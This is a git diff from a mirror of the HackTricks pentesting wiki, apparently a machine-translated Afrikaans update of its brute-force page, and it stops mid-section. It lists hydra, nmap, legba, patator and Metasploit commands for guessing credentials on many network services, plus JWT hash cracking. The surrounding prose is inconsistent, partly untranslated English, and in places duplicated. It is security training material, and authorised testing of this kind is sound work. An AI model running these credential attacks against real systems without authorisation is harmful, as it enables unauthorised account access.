mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
Translated ['generic-methodologies-and-resources/brute-force.md'] to af
This commit is contained in:
parent
2a51736f49
commit
0465b30f28
1 changed files with 194 additions and 138 deletions
|
@ -14,17 +14,17 @@ Kry Toegang Vandag:
|
|||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Standaard Gelde
|
||||
|
||||
**Soek in Google** vir die standaardgelde van die tegnologie wat gebruik word, of **probeer hierdie skakels**:
|
||||
**Soek in Google** vir die standaard gelde van die tegnologie wat gebruik word, of **probeer hierdie skakels**:
|
||||
|
||||
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
|
||||
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
|
||||
|
@ -37,7 +37,7 @@ Ander maniere om HackTricks te ondersteun:
|
|||
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
|
||||
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
|
||||
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
|
||||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||||
|
||||
## **Skep jou eie Woordeboeke**
|
||||
|
||||
|
@ -56,7 +56,7 @@ crunch 6 8 -t ,@@^^%%
|
|||
```
|
||||
### Cewl
|
||||
|
||||
Cewl is 'n hulpmiddel wat gebruik word om woorde uit 'n webwerf te onttrek en 'n woordelys te skep vir aanvalle met krag. Dit kan help om doelwitsleutels te identifiseer vir aanvalle met krag.
|
||||
Cewl is 'n hulpmiddel wat gebruik word om woorde uit 'n webwerf te onttrek en 'n woordelys te skep vir aanvalle met geweld. Dit kan help om doelwitspesifieke woorde te identifiseer vir aanvalle met geweld soos woordelysaanvalle.
|
||||
```bash
|
||||
cewl example.com -m 5 -w words.txt
|
||||
```
|
||||
|
@ -68,7 +68,7 @@ python3 cupp.py -h
|
|||
```
|
||||
### [Wister](https://github.com/cycurity/wister)
|
||||
|
||||
'n Woordelys generator instrument, wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegee woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
|
||||
'n Woordelys-generatorwerktuig, wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegewe woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
|
||||
```bash
|
||||
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
|
||||
|
||||
|
@ -105,14 +105,14 @@ Finished in 0.920s.
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werksvloei** aangedryf deur die wêreld se **mees gevorderde** gemeenskaplike gereedskap.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Dienste
|
||||
|
||||
Gelys in alfabetiese volgorde volgens diensnaam.
|
||||
Gesorteer alfabeties volgens diensnaam.
|
||||
|
||||
### AFP
|
||||
```bash
|
||||
|
@ -126,13 +126,7 @@ msf> run
|
|||
```
|
||||
### AJP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against the AJP protocol can be carried out using tools like Hydra or Burp Suite Intruder. These tools can be used to guess usernames and passwords by systematically trying all possible combinations until the correct one is found.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks on the AJP protocol, it is recommended to implement strong password policies, enable account lockout mechanisms after a certain number of failed login attempts, and use multi-factor authentication where possible. Additionally, monitoring and logging login attempts can help in detecting and mitigating such attacks.
|
||||
AJP (Apache JServ Protocol) is a binary protocol that can be brute-forced to gain unauthorized access. It is commonly used to connect web servers and servlet containers.
|
||||
```bash
|
||||
nmap --script ajp-brute -p 8009 <IP>
|
||||
```
|
||||
|
@ -142,7 +136,7 @@ legba amqp --target localhost:5672 --username admin --password data/passwords.tx
|
|||
```
|
||||
### Cassandra
|
||||
|
||||
Brute-force attacks against Cassandra can be carried out using a variety of tools such as Hydra, Ncrack, and Metasploit. These tools can be used to guess passwords and gain unauthorized access to the database. It is important to use strong and complex passwords, implement account lockout policies, and monitor for any suspicious activity to protect against brute-force attacks.
|
||||
Brute-force attacks against Cassandra databases are typically carried out by trying common usernames and passwords or by using password lists. These attacks can be automated using tools like Hydra or Medusa. It is important to ensure that strong authentication mechanisms are in place to prevent successful brute-force attacks.
|
||||
```bash
|
||||
nmap --script cassandra-brute -p 9160 <IP>
|
||||
# legba ScyllaDB / Apache Casandra
|
||||
|
@ -150,7 +144,19 @@ legba scylla --username cassandra --password wordlists/passwords.txt --target lo
|
|||
```
|
||||
### CouchDB
|
||||
|
||||
Brute-force attacks against CouchDB are relatively simple to execute. The most common method is to use a tool like Hydra to repeatedly try different username and password combinations until the correct one is found. This can be effective if weak credentials are used. It is important to note that brute-forcing is illegal and unethical unless you have explicit permission to test the security of a CouchDB instance.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to gain unauthorized access to a CouchDB instance by repeatedly trying different passwords until the correct one is discovered.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks on CouchDB, it is recommended to:
|
||||
|
||||
1. Implement strong password policies.
|
||||
2. Limit the number of login attempts.
|
||||
3. Use multi-factor authentication.
|
||||
4. Monitor login attempts for suspicious activity.
|
||||
5. Consider implementing account lockout mechanisms after multiple failed login attempts.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/couchdb/couchdb_login
|
||||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
|
||||
|
@ -163,21 +169,7 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/word
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to crack passwords or encryption keys. In the context of Elasticsearch, brute force attacks can be attempted against the authentication mechanisms to gain unauthorized access to the system.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks in Elasticsearch, consider implementing the following measures:
|
||||
|
||||
1. **Strong Passwords**: Encourage users to use complex and unique passwords to make it harder for attackers to guess.
|
||||
|
||||
2. **Account Lockout**: Implement account lockout policies that lock user accounts after a certain number of failed login attempts.
|
||||
|
||||
3. **Rate Limiting**: Configure rate limiting to restrict the number of login attempts from a single source within a specific time frame.
|
||||
|
||||
4. **Multi-Factor Authentication (MFA)**: Enforce MFA to add an extra layer of security to the authentication process.
|
||||
|
||||
By implementing these protection measures, you can significantly reduce the risk of unauthorized access through brute force attacks.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used to crack passwords and gain unauthorized access to systems or accounts. In the context of Elasticsearch, brute force attacks can be used to guess the credentials of the Elasticsearch cluster and gain access to sensitive data. It is important to implement strong password policies and other security measures to protect against brute force attacks.
|
||||
```
|
||||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
|
||||
```
|
||||
|
@ -222,11 +214,25 @@ cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
|||
```
|
||||
### IMAP
|
||||
|
||||
#### Brute Force
|
||||
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. It allows the end user to view and manipulate the messages as though they were stored locally on the end user's device.
|
||||
|
||||
Brute force attacks against IMAP are typically carried out using tools such as Hydra or Nmap. These tools allow an attacker to systematically check all possible usernames and passwords until the correct combination is found.
|
||||
### Brute Force Attack
|
||||
|
||||
To protect against brute force attacks, it is recommended to implement account lockout policies, strong password requirements, and multi-factor authentication. Additionally, monitoring login attempts for unusual patterns can help detect and mitigate brute force attacks.
|
||||
#### Description
|
||||
|
||||
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
|
||||
|
||||
#### Tools
|
||||
|
||||
- Hydra
|
||||
- Medusa
|
||||
- Ncrack
|
||||
|
||||
#### Countermeasures
|
||||
|
||||
- Implement account lockout policies
|
||||
- Use complex and unique passwords
|
||||
- Implement multi-factor authentication
|
||||
```bash
|
||||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
||||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
||||
|
@ -235,7 +241,21 @@ legba imap --username user --password data/passwords.txt --target localhost:993
|
|||
```
|
||||
### IRC
|
||||
|
||||
IRC (Internet Relay Chat) is 'n protokol wat gebruik word vir real-time teksgesprekke oor die internet. Dit is 'n gewilde platform vir kommunikasie en same-werking tussen gebruikers regoor die wêreld.
|
||||
#### Brute Force
|
||||
|
||||
Brute force is a common technique used to gain unauthorized access to IRC channels. Attackers use automated tools to try a large number of username and password combinations until they find the correct one. This method is effective against weak or easily guessable passwords. It is important for IRC users to use strong and unique passwords to protect their accounts from brute force attacks.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks on IRC channels, users should follow these best practices:
|
||||
|
||||
- **Use Strong Passwords:** Create passwords that are long, complex, and unique.
|
||||
- **Enable Account Lockout:** Implement account lockout policies to lock accounts after a certain number of failed login attempts.
|
||||
- **Monitor Login Attempts:** Keep track of login attempts and investigate any suspicious activity.
|
||||
- **Use Two-Factor Authentication:** Enable two-factor authentication for an extra layer of security.
|
||||
- **Regularly Update Passwords:** Change passwords regularly to reduce the risk of brute force attacks.
|
||||
|
||||
By following these mitigation techniques, IRC users can enhance the security of their accounts and protect themselves from brute force attacks.
|
||||
```bash
|
||||
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
||||
```
|
||||
|
@ -243,13 +263,19 @@ nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against iSCSI targets involve attempting to guess the target's CHAP (Challenge-Handshake Authentication Protocol) credentials by trying all possible combinations of usernames and passwords. This is a common method used to gain unauthorized access to iSCSI storage resources. It is essential to use strong and unique credentials to protect against brute force attacks.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to crack weak passwords or gain unauthorized access to systems. It is important to use strong, complex passwords to protect against brute force attacks.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van 'n wagwoord te probeer totdat die regte een gevind word. Hierdie metode kan gebruik word om swak wagwoorde te kraak of ongemagtigde toegang tot stelsels te verkry. Dit is belangrik om sterk, komplekse wagwoorde te gebruik om teen brute force-aanvalle te beskerm.
|
||||
```bash
|
||||
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
||||
```
|
||||
### JWT
|
||||
|
||||
JWT (JSON Web Tokens) is 'n open standaard (RFC 7519) wat 'n kompak, self-inhoudende manier bied om inligting tussen partye as 'n JSON-voorwerp oor te dra. Hierdie inligting kan geverifieer en vertrou word omdat dit digitaal onderteken is. JWT's kan gebruik word vir verifikasie en uitruil van inligting tussen partye.
|
||||
### JWT
|
||||
```bash
|
||||
#hashcat
|
||||
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
|
||||
|
@ -274,21 +300,19 @@ jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm
|
|||
```
|
||||
### LDAP
|
||||
|
||||
LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om inligting uit 'n gidsdiens te onttrek of daarin te plaas. Dit kan gebruik word vir die uitvoering van aanvalle soos woordeboekaanvalle en bruto-kragaanvalle om toegang tot die gidsdiens te verkry.
|
||||
LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om inligting uit 'n gidsdiens te onttrek of daarin te plaas. Dit kan gebruik word vir die uitvoering van aanvalle soos woordeboekaanvalle of bruto-kragaanvalle om toegang tot die gidsdiens te verkry.
|
||||
```bash
|
||||
nmap --script ldap-brute -p 389 <IP>
|
||||
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
|
||||
```
|
||||
### MQTT
|
||||
|
||||
MQTT (Message Queuing Telemetry Transport) is 'n ligte boodskap protokol wat ontwerp is vir klein toestelle met beperkte vermoëns en bandwydte. MQTT gebruik 'n "publish-subscribe" boodskap uitruil patroon om boodskappe tussen kliënte en bedieners te stuur.
|
||||
MQTT (Message Queuing Telemetry Transport) is 'n ligte boodskap protokol wat ontwerp is vir klein toestelle met beperkte verwerking en bandwydte hulpbronne. MQTT word dikwels gebruik vir die kommunikasie tussen toestelle in die Internet of Things (IoT) konteks.
|
||||
```
|
||||
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
|
||||
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
|
||||
```
|
||||
### Mongo
|
||||
|
||||
Brute force attacks against MongoDB databases are common due to the default configuration allowing unauthenticated access. Attackers can use tools like Hydra or custom scripts to attempt to guess usernames and passwords. It is crucial to secure MongoDB instances by setting strong passwords, enabling authentication, and restricting access to trusted IP addresses.
|
||||
```bash
|
||||
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
||||
use auxiliary/scanner/mongodb/mongodb_login
|
||||
|
@ -296,7 +320,9 @@ legba mongodb --target localhost:27017 --username root --password data/passwords
|
|||
```
|
||||
### MSSQL
|
||||
|
||||
Brute-force attacks against MSSQL servers are typically performed using tools such as Hydra, Ncrack, or Metasploit. These tools allow an attacker to systematically try different username and password combinations until the correct one is found. It is important to note that brute-force attacks can be detected and blocked by implementing account lockout policies or using intrusion detection systems.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to MSSQL databases. Attackers use automated tools to systematically try different combinations at a rapid pace until they find the right credentials. It is essential to have strong and unique passwords to mitigate the risk of a successful brute force attack.
|
||||
```bash
|
||||
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
||||
```
|
||||
|
@ -304,7 +330,17 @@ legba mssql --username SA --password wordlists/passwords.txt --target localhost:
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to MySQL databases. Attackers use automated tools to systematically try different combinations until they find the right credentials. To protect against brute force attacks, it is essential to use strong and unique passwords, implement account lockout policies, and monitor for multiple failed login attempts.
|
||||
Brute force attacks involve systematically checking all possible keys or passwords until the correct one is found. This method can be used to crack MySQL user passwords by trying all possible combinations until the correct one is discovered.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks in MySQL, consider implementing the following measures:
|
||||
|
||||
1. **Strong Passwords**: Encourage users to use strong, complex passwords that are difficult to guess.
|
||||
2. **Account Lockout**: Implement account lockout policies that lock out users after a certain number of failed login attempts.
|
||||
3. **Rate Limiting**: Use rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication**: Implement multi-factor authentication to add an extra layer of security to user accounts.
|
||||
5. **Monitoring**: Regularly monitor MySQL logs for any suspicious login activities and investigate them promptly.
|
||||
```bash
|
||||
# hydra
|
||||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||||
|
@ -320,20 +356,7 @@ legba mysql --username root --password wordlists/passwords.txt --target localhos
|
|||
```
|
||||
### OracleSQL
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be effective but is time-consuming and resource-intensive. It is important to use strong and complex passwords to mitigate the risk of a successful brute force attack.
|
||||
|
||||
#### Brute Force Protection
|
||||
|
||||
To protect against brute force attacks, consider implementing the following measures:
|
||||
|
||||
1. **Account Lockout**: Implement account lockout policies that lock an account after a certain number of failed login attempts.
|
||||
2. **CAPTCHA**: Use CAPTCHA challenges to differentiate between human users and automated bots.
|
||||
3. **Rate Limiting**: Implement rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication (MFA)**: Require users to provide additional verification, such as a code sent to their mobile device, in addition to their password.
|
||||
|
||||
By implementing these measures, you can significantly reduce the risk of a successful brute force attack on your OracleSQL database.
|
||||
Brute-force attacks against OracleSQL databases are typically performed using tools such as Hydra or Metasploit. These tools allow attackers to systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to note that brute-force attacks can be time-consuming and resource-intensive, so they should be used as a last resort when other methods of gaining access to the database have been exhausted.
|
||||
```bash
|
||||
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
||||
|
||||
|
@ -361,7 +384,7 @@ Om **oracle\_login** met **patator** te gebruik, moet jy dit **installeer**:
|
|||
```bash
|
||||
pip3 install cx_Oracle --upgrade
|
||||
```
|
||||
[Aflyn OracleSQL-hash-bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**):
|
||||
[Aflyn OracleSQL-hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**):
|
||||
```bash
|
||||
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
||||
```
|
||||
|
@ -369,13 +392,7 @@ nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks are one of the simplest and most common hacking techniques. In a brute force attack, the hacker uses automated tools to try all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective, especially if the passwords are weak.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Geweldenaanval
|
||||
|
||||
Geweldenaanvalle is een van die eenvoudigste en mees algemene hakmetodes. In 'n geweldenaanval gebruik die hacker outomatiese gereedskap om alle moontlike kombinasies van gebruikersname en wagwoorde te probeer totdat die regte een gevind word. Hierdie metode is tydrowend maar kan effektief wees, veral as die wagwoorde swak is.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is time-consuming but can be effective, especially if the password is weak. Tools like Hydra and Medusa can automate the process of brute-forcing passwords. It is important to note that brute force attacks can be detected and prevented by implementing measures such as account lockouts after multiple failed login attempts.
|
||||
```bash
|
||||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
||||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
||||
|
@ -390,23 +407,18 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be effective but is time-consuming and resource-intensive. It is important to use strong, complex passwords to mitigate the risk of a successful brute force attack.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to gain unauthorized access to a PostgreSQL database by repeatedly trying different passwords.
|
||||
|
||||
#### Brute Force Protection
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks, consider implementing the following measures:
|
||||
To protect against brute force attacks in PostgreSQL, you can implement the following measures:
|
||||
|
||||
1. **Lockout Policy:** Implement a lockout policy that locks out users after a certain number of failed login attempts. This can help prevent attackers from continuously trying different passwords.
|
||||
1. **Strong Passwords**: Encourage users to use strong, complex passwords that are difficult to guess.
|
||||
2. **Account Lockout**: Implement account lockout policies that lock an account after a certain number of failed login attempts.
|
||||
3. **Rate Limiting**: Implement rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication (MFA)**: Enforce the use of MFA to add an extra layer of security to the authentication process.
|
||||
|
||||
2. **Account Lockout Duration:** Specify a duration for which an account remains locked after multiple failed login attempts. This can deter attackers from targeting the same account repeatedly.
|
||||
|
||||
3. **Complex Password Requirements:** Enforce complex password requirements such as minimum length, special characters, and a mix of uppercase and lowercase letters. This can make it harder for attackers to guess passwords through brute force.
|
||||
|
||||
4. **Multi-Factor Authentication (MFA):** Implement MFA to add an extra layer of security beyond passwords. This can help mitigate the risk of unauthorized access even if passwords are compromised.
|
||||
|
||||
5. **Monitoring and Alerts:** Set up monitoring and alerts for suspicious login activities, such as multiple failed login attempts within a short period. This can help detect and respond to brute force attacks in real-time.
|
||||
|
||||
By implementing these measures, you can enhance the security of your PostgreSQL database and reduce the risk of unauthorized access through brute force attacks.
|
||||
By implementing these protection measures, you can significantly reduce the risk of a successful brute force attack on your PostgreSQL database.
|
||||
```bash
|
||||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
||||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
||||
|
@ -427,7 +439,16 @@ cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against RDP servers are common and can be successful if proper security measures are not in place. Attackers use automated tools to try a large number of username and password combinations until they find the correct one. This can be mitigated by implementing account lockout policies, using complex passwords, and enabling Network Level Authentication (NLA) where possible.
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to RDP servers. Attackers can use automated tools to rapidly try different combinations, making it a popular choice for hacking.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To protect against brute force attacks on RDP, it is recommended to:
|
||||
- Use complex and unique passwords
|
||||
- Implement account lockout policies
|
||||
- Use multi-factor authentication
|
||||
- Limit the number of login attempts
|
||||
- Monitor and log RDP login activity
|
||||
```bash
|
||||
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
||||
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
||||
|
@ -435,7 +456,7 @@ legba rdp --target localhost:3389 --username admin --password data/passwords.txt
|
|||
```
|
||||
### Redis
|
||||
|
||||
Redis is 'n in-memory data store wat dikwels gebruik word vir caching en sessiebeheer in webtoepassings. Dit kan ook gebruik word as 'n databasis vir klein tot medium projekte. Redis is bekend vir sy vinnige lees- en skryfoperasies, wat dit 'n gewilde keuse maak vir situasies waar spoed 'n prioriteit is.
|
||||
Redis is 'n in-memory data store wat dikwels gebruik word vir caching en sessiebeheer in webtoepassings. Dit kan ook gebruik word vir die hantering van boodskappe in 'n boodskapgeorkestreerde stelsel. Redis is bekend vir sy vinnige lees- en skryfoperasies, wat dit 'n gewilde keuse maak vir situasies waar spoed 'n prioriteit is.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/redis/redis_login
|
||||
nmap --script redis-brute -p 6379 <IP>
|
||||
|
@ -444,19 +465,33 @@ legba redis --target localhost:6379 --username admin --password data/passwords.t
|
|||
```
|
||||
### Rexec
|
||||
|
||||
Rexec is a simple service that allows users to execute commands on a remote system. It is often used during penetration testing to brute force credentials or execute commands on a compromised system.
|
||||
#### Brute Force
|
||||
|
||||
Brute force is a technique used to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This method is often used as a last resort when other more sophisticated methods have failed. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the passwords are weak or easily guessable.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks, it is essential to use strong, complex passwords that are not easily guessable. Additionally, implementing account lockout policies after a certain number of failed login attempts can help prevent attackers from gaining access to the system. Using multi-factor authentication can also add an extra layer of security to protect against brute force attacks.
|
||||
```bash
|
||||
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
||||
```
|
||||
### Rlogin
|
||||
|
||||
Rlogin is 'n ongesekuriseerde remote login-protokol wat dikwels gebruik word vir aanvalle met 'n brute force-metode. Die aanvaller kan 'n groot aantal wagwoorde probeer totdat die regte een gevind word om toegang tot 'n stelsel te verkry.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used in hacking to gain unauthorized access to a system. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the password is weak or easily guessable.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks, it is recommended to use strong and complex passwords, implement account lockout policies, and use multi-factor authentication. Additionally, monitoring login attempts and setting up intrusion detection systems can help detect and prevent brute force attacks.
|
||||
```bash
|
||||
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
||||
```
|
||||
### Rsh
|
||||
|
||||
Rsh (Remote Shell) is a simple remote shell client included with Unix operating systems. It can be used to execute commands on a remote system. Rsh is often targeted during brute force attacks due to its lack of encryption and authentication mechanisms. It is recommended to disable or uninstall Rsh if not needed to prevent unauthorized access to systems.
|
||||
#### Brute Force
|
||||
|
||||
Brute force is a straightforward attack method that tries all possible combinations of a password until the correct one is found. This method is time-consuming but effective, especially against weak passwords. Tools like Hydra and Medusa can automate the brute force process. It is essential to use this method responsibly and only on systems you own or have explicit permission to test.
|
||||
```bash
|
||||
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
||||
```
|
||||
|
@ -468,7 +503,9 @@ nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/va
|
|||
```
|
||||
### RTSP
|
||||
|
||||
RTSP (Real Time Streaming Protocol) is 'n netwerkbestuursprotokol wat gebruik word vir die stroom van kontinu streaming media soos video en klank.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against RTSP servers can be performed using tools like Hydra or Nmap. These tools can help automate the process of trying different username and password combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and resource-intensive, so they should be used with caution and only in scenarios where other methods have failed.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt <IP> rtsp
|
||||
```
|
||||
|
@ -480,9 +517,7 @@ legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --tar
|
|||
```
|
||||
### SNMP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against SNMP involve attempting to guess the community string used for authentication. This can be done using tools like `onesixtyone` or `snmpwalk`. The goal is to find a valid community string that allows read or write access to the SNMP agent.
|
||||
SNMP (Simple Network Management Protocol) is a protocol used for network management and monitoring. It operates on the application layer of the OSI model and is commonly used to gather information from network devices such as routers, switches, printers, and servers. SNMP uses a community string for authentication, which can be vulnerable to brute-force attacks.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/snmp/snmp_login
|
||||
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
||||
|
@ -491,7 +526,9 @@ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt ta
|
|||
```
|
||||
### SMB
|
||||
|
||||
### SMB
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to systems and accounts. It is important to use strong and unique passwords to protect against brute force attacks.
|
||||
```bash
|
||||
nmap --script smb-brute -p 445 <IP>
|
||||
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
||||
|
@ -499,13 +536,7 @@ legba smb --target share.company.com --username admin --password data/passwords.
|
|||
```
|
||||
### SMTP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
